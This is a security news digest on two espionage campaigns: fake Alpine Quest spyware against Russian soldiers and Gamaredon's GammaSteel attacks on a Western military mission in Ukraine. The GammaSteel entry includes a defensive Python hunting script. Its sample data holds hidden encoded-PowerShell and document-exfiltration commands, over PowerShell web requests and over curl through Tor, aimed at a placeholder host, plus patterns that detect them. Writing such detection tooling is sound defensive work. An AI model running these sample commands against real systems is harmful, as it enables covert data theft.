info@thehackernews.com (The Hacker News)
Russian military personnel are being targeted by a new Android spyware campaign that disguises itself as a legitimate Alpine Quest mapping application. The spyware, dubbed Android.Spy.1292.origin, is distributed through unofficial channels, including Russian Android app catalogs and a fake Telegram channel promoting a pirated "Pro" version of the app. Once installed, the trojanized app functions like the original Alpine Quest, a popular navigation tool used by outdoor enthusiasts and also relied upon by Russian soldiers in military zones due to its offline capabilities. This allows the malware to remain undetected while it secretly harvests sensitive data from the compromised device.
The spyware collects a wide range of information, including the user's phone number, contact lists, geolocation data, and a list of files stored on the device. This data is then sent to a remote command-and-control server and a Telegram bot controlled by the attackers. The attackers are particularly interested in retrieving confidential documents shared via messaging apps like Telegram and WhatsApp. The malware also targets a specific file called "locLog" created by Alpine Quest, which logs detailed user movement data. By stealing this file, the attackers can reconstruct the victim's movements over time, enabling surveillance.
Security researchers at Doctor Web discovered the campaign and noted the modular design of the spyware, which allows attackers to expand its capabilities by downloading additional modules. This enables the exfiltration of specific content and the execution of a wider spectrum of malicious tasks. The attacks mirror tactics previously deployed by Russian groups against Ukrainian soldiers, seeking to access data from military apps and encrypted messaging apps. Experts advise downloading Android apps only from trusted app marketplaces and avoiding "free" copies of paid software from dubious sources to mitigate the risk posed by such threats.
References:
- hackread.com: Fake Alpine Quest Mapping App Spotted Spying on Russian Military
- Risky.Biz: Risky Bulletin: Russian military personnel targeted with Android spyware reminiscent of Russia's own tactics
- Risky Business Media: Risky Bulletin: Russian military personnel targeted with Android spyware
- The Hacker News: Android Spyware Disguised as Alpine Quest App Targets Russian Military Devices
- bsky.app (Risky Business): Russian military personnel targeted with Android spyware reminiscent of Russia's own tactics. Podcast: risky.biz/RBNEWS415/ Newsletter: https://news.risky.biz/risky-bulletin-russian-military-personnel-targeted-with-android-spyware-reminiscent-of-russias-own-tactics/
- BleepingComputer: Russian army targeted by new Android malware hidden in mapping app
- github.com: Details on trojanized Alpine Quest app version
- The Register - Security: Booby-trapped Alpine Quest Android app geolocates Russian soldiers
- www.scworld.com: Spyware-laced app targeted Russian military phones
- securityaffairs.com: Android spyware hidden in mapping software targets Russian soldiers
- The DefendOps Diaries: Espionage Threats: Android.Spy.1292.origin and Military Cybersecurity
Classification:
- HashTags: #Android #Spyware #Military
- Company: Doctor Web
- Target: Russian Military Personnel
- Attacker: Russian
- Product: Alpine Quest
- Feature: Data Theft
- Malware: Android.Spy.1292.origin
- Type: Malware
- Severity: Major
Pierluigi Paganini@Security Affairs
The Russia-linked cyber espionage group Shuckworm, also known as Gamaredon or Armageddon, is actively targeting a Western country's military mission based in Ukraine. The campaign, which began in February 2025 and continued through March, involves the deployment of an updated, PowerShell-based version of its GammaSteel infostealer malware. This latest wave of activity underscores Shuckworm's persistent focus on Ukrainian targets, with the group believed to be operating on behalf of Russia's Federal Security Service (FSB). They have historically concentrated their efforts on government, military, and law enforcement targets in Ukraine.
The initial infection vector in this campaign appears to be infected removable drives. Evidence from the Windows Registry's UserAssist key suggests that the infection was triggered from such an external drive. The attack chain is multi-staged and designed to minimize detection. It involves the execution of obfuscated VBScript and PowerShell scripts stored in the registry. This shift towards PowerShell-based tools allows Shuckworm to improve obfuscation and store scripts directly within the Windows Registry, making file-based detection more challenging.
GammaSteel, the malware deployed in this campaign, now has enhanced reconnaissance features. It is capable of capturing screenshots, gathering system information, and enumerating desktop contents and user documents. The malware targets specific file types such as documents, spreadsheets, and PDFs. Shuckworm's exfiltration methods have also become more sophisticated, utilizing PowerShell web requests or cURL with Tor proxies to extract sensitive data stealthily. This campaign demonstrates an increase in sophistication for Shuckworm, with the group leveraging legitimate web services to lower the risk of detection.
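As an added defensive example (not code from Symantec or any of the cited reports), the following Python hunts over constructed registry values and process command lines for the two behaviours the summary describes: script bodies stored in registry values instead of files, and exfiltration through PowerShell web requests or curl routed through a Tor SOCKS proxy. The marker patterns, sample keys and command lines are assumptions for illustration.

```python
import re

# Constructed sample registry values (key, value name, data) as a hunt script
# would read them back; the CLSID path and encoded blob are made up, not IoCs.
SAMPLE_REGISTRY_VALUES = [
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "OneDrive",
     "C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"),
    ("HKCU\\Software\\Classes\\CLSID\\{0000}", "Payload",
     "Set o=CreateObject(\"WScript.Shell\"):o.Run \"powershell -w hidden -enc "
     + "QQ" * 120 + "\",0"),
]

# Constructed process-creation command lines (e.g. from Sysmon event 1).
SAMPLE_PROCESS_EVENTS = [
    "powershell.exe -w hidden -c Invoke-WebRequest -Uri http://example.invalid/up "
    "-Method POST -InFile C:\\Users\\u\\Documents\\report.docx",
    "curl.exe --socks5-hostname 127.0.0.1:9050 -F file=@C:\\Users\\u\\Documents\\x.pdf "
    "http://example.invalid/",
    "notepad.exe C:\\Users\\u\\Desktop\\notes.txt",
]

# Tokens that rarely appear in legitimate registry data but do in embedded
# VBScript/PowerShell loaders; the encoded-command check needs a long base64 run.
SCRIPT_MARKERS = re.compile(
    r"WScript\.Shell|Invoke-Expression|\bIEX\b|FromBase64String"
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.IGNORECASE)
POWERSHELL_WEB = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|UploadFile|-Method\s+POST",
    re.IGNORECASE)
# curl pointed at a local SOCKS proxy on the default Tor ports (9050/9150).
CURL_TOR = re.compile(
    r"(--socks5(-hostname)?|(-x|--proxy)\s+socks[45]h?://)\s*\S*?(9050|9150)\b",
    re.IGNORECASE)


def registry_script_findings(values, min_len=200):
    """Return 'key\\name' for values that look like scripts rather than paths."""
    findings = []
    for key, name, data in values:
        looks_like_path = data.lower().lstrip('"').startswith("c:\\")
        if SCRIPT_MARKERS.search(data) or (len(data) >= min_len and not looks_like_path):
            findings.append(f"{key}\\{name}")
    return findings


def classify_exfil(command_line):
    """Label a command line with the exfiltration methods it matches, if any."""
    labels = []
    if re.search(r"powershell|pwsh", command_line, re.I) and POWERSHELL_WEB.search(command_line):
        labels.append("powershell web request")
    if re.search(r"\bcurl(\.exe)?\b", command_line, re.I) and CURL_TOR.search(command_line):
        labels.append("curl via Tor SOCKS proxy")
    return labels
```

Both checks are heuristics meant for triage, not a replacement for baselining which keys and processes are normal on the host.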
References:
- bsky.app: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives.
- cyberpress.org: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
- gbhackers.com: Shuckworm Group Leverages GammaSteel Malware in Targeted PowerShell Attacks
- The Hacker News: Shuckworm targets Western military mission
- Broadcom Software Blogs: Shuckworm Targets Foreign Military Mission Based in Ukraine
- gbhackers.com: The Russia-linked cyber-espionage group known as Shuckworm (also identified as Gamaredon or Armageddon) has been observed targeting a Western country’s military mission located within Ukraine, employing an updated, PowerShell-based version of its GammaSteel infostealer malware.
- securityonline.info: Russia-linked espionage group Shuckworm (also known as Gamaredon or Armageddon) has launched a renewed and more sophisticated cyber campaign targeting a foreign military mission based in Ukraine, according to a detailed report by the Symantec Threat Hunter Team. This latest wave of activity, which began in February 2025 and continued through March, underscores Shuckworm’s relentless […]
- BleepingComputer: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. [...]
- securityonline.info: Shuckworm’s Sophisticated Cyber Campaign Targets Ukraine Military Mission
- Cyber Security News: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
- The Hacker News: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine
- www.bleepingcomputer.com: Russian hackers attack Western military mission using malicious drive
- www.csoonline.com: Russian Shuckworm APT is back with updated GammaSteel malware
- securityaffairs.com: Gamaredon targeted the military mission of a Western country based in Ukraine
- The DefendOps Diaries: Explore Gamaredon's evolving cyber tactics targeting Western military missions with advanced evasion techniques and PowerShell tools.
- www.sentinelone.com: Police arrest SmokeLoader malware customers, AkiraBot abuses AI to bypass CAPTCHAs, and Gamaredon delivers GammaSteel via infected drives.
- PCMag UK security: A suspected state-sponsored Russian group may have developed the 'GammaSteel' attack to help them spy on and steal data from a military mission in Ukraine. A malware-laden storage drive may have helped Russia spy on military activities in Ukraine.
- www.scworld.com: Infected removable drives were used to spread the malware.
- Metacurity: Cybersecurity industry is mum on SentinelOne EO, Comptroller of the Currency lacked MFA on hacked email account, Morocco confirms massive cyber attack, Gamaredon is targeting Western military mission in Ukraine, Ethical hacker stole $2.6m from Morpho Labs, Sex chatbots leak information, much more
- ciso2ciso.com: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine – Source:thehackernews.com
- ciso2ciso.com: The group targeted the military mission of a Western country, per the report. Infected removable drives have been used by the group.
- Metacurity: Gamaredon is targeting Western military mission in Ukraine
- Security Risk Advisors: 🚩Shuckworm Compromises Western Military Mission in Ukraine Using Updated PowerShell GammaSteel Malware
- Security Latest: For the past decade, this group of FSB hackers, including "traitor" Ukrainian intelligence officers, has used a grinding barrage of intrusion campaigns to make life hell for their former countrymen and cybersecurity defenders.
Classification:
- HashTags: #APT #Ukraine #GammaSteel
- Company: Symantec
- Target: Ukraine Military
- Attacker: Gamaredon
- Product: PowerShell
- Feature: GammaSteel
- Malware: GammaSteel
- Type: Espionage
- Severity: Major